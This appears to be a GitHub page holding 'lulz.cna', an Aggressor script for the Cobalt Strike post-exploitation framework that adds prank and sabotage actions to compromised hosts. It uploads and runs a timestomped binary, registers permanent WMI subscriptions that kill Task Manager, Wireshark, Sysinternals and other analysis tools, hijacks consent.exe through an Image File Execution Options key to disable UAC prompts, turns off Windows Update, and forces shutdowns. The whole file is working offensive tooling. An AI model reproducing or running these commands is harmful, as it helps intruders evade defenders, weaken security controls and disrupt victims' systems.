-
Notifications
You must be signed in to change notification settings - Fork 40
/
Copy pathlulz.cna
106 lines (100 loc) · 6.14 KB
/
lulz.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
sub boo {
if (-exists script_resource("boo.exe")) {
bcd($1, '"c:\users\public\documents"');
# place boo.exe in the same local directory as this script
blog($1,'Uploading boo.exe to c:\users\public\documents.');
bupload($1, script_resource("boo.exe"));
btimestomp($1, "boo.exe", 'c:\windows\system32\cmd.exe');
blog($1,"Taking screenshots for the next 120 seconds.");
binput($1, "screenshot");
bscreenshot($1, 120);
bshell($1, "start boo.exe");
}
else {
berror($1, "boo.exe does not exist :(");
}
}
sub sysinternalkiller {
bpowershell_import($1, script_resource("powerlurk.ps1"));
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc1 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName taskmgr.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc2 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName wireshark.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc3 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName tcpview.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc4 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName procdump.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc5 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName procexp.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc6 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName procmon.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc7 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName netstat.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc8 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName psloggedon.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc9 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName logonsessions.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc10 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName processhacker.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc11 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName autoruns.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc12 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName autorunsc.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc13 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName regedit.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc14 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName regshot.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc15 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName procexp64.exe');
bpowerpick($1, 'Register-MaliciousWmiEvent -EventName KillProc16 -PermanentCommand "powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName tcpview.exe');
}
sub consentkiller {
bshell($1, 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\consent.exe" /v Debugger /t REG_SZ /d "taskkill /IM consent.exe /F" /f');
}
sub windowsupdatekiller {
bshell($1, 'reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /t REG_DWORD /d 1 /f');
}
popup beacon_bottom {
menu "Lulz" {
item "IE Kiosk Popup" {
prompt_text("What site do you want to pop up?", "https://google.com", lambda({
binput(@ids,"C:\\Progra~1\\Intern~1\\iexplore.exe -k $1");
bshell(@ids, "C:\\Progra~1\\Intern~1\\iexplore.exe -k $1");
}, @ids => $1));
}
item "Clippy" {
#BE SURE TO RUN SET UP STEPS
#based on this blog post: https://mellowtigger.dreamwidth.org/250130.html
#
prompt_text("What should Clippy say?", "Try Harder", lambda({
$text = '$MI6 = new-object -com agent.control.2; $MI6.connected = $true; $MI6.characters.load("Clippy","Clippit.acs"); $agent = $MI6.characters.character("Clippy"); $agent.moveto(800,400); $agent.Show(); $agent.Play("Wave"); $agent.think(" ' . $1 . ' "); $agent.Play("Wave"); Start-Sleep -s 4; $agent.Play("Wave"); $agent.hide(); while ($agent.visible) { sleep -Milliseconds 100 }; $MI6.characters.unload("Clippy");';
binput(@ids,"$text");
bpowershell(@ids, "$text");
blog(@ids,"Clippy finished helping out.")
}, @ids => $1));
}
item "Windows Alert (Win 7+)" {
prompt_text("What should the alert say?", "Try Harder", lambda({
bpowershell(@ids, 'Add-Type -AssemblyName Microsoft.VisualBasic; [Microsoft.VisualBasic.Interaction]::MsgBox("' . $1 . '", "OKOnly,MsgBoxSetForeground,SystemModal,Exclamation", "")' );
blog(@ids,"Creating an alert box with the following message: $1 ");
}, @ids => $1));
}
item "Shutdown Host" {
prompt_confirm("Are you SURE you want to bounce the box(es)?", "Confirm", lambda({
blog(@ids,"shutting down");
bshell(@ids, "shutdown /s /f /t 00");
}, @ids => $1));
}
item "Boo.exe" {
#Put 'boo.exe' in the same directory as this script
#
local('$bid');
foreach $bid ($1) {
boo($bid);
}
}
item "Sysinternal Killer" {
local('$bid');
foreach $bid ($1) {
sysinternalkiller($bid);
}
}
item "UAC Killer" {
local('$bid');
foreach $bid ($1) {
consentkiller($bid);
}
}
item "Windows Update Killer" {
local('$bid');
foreach $bid ($1) {
windowsupdatekiller($bid);
}
}
}
}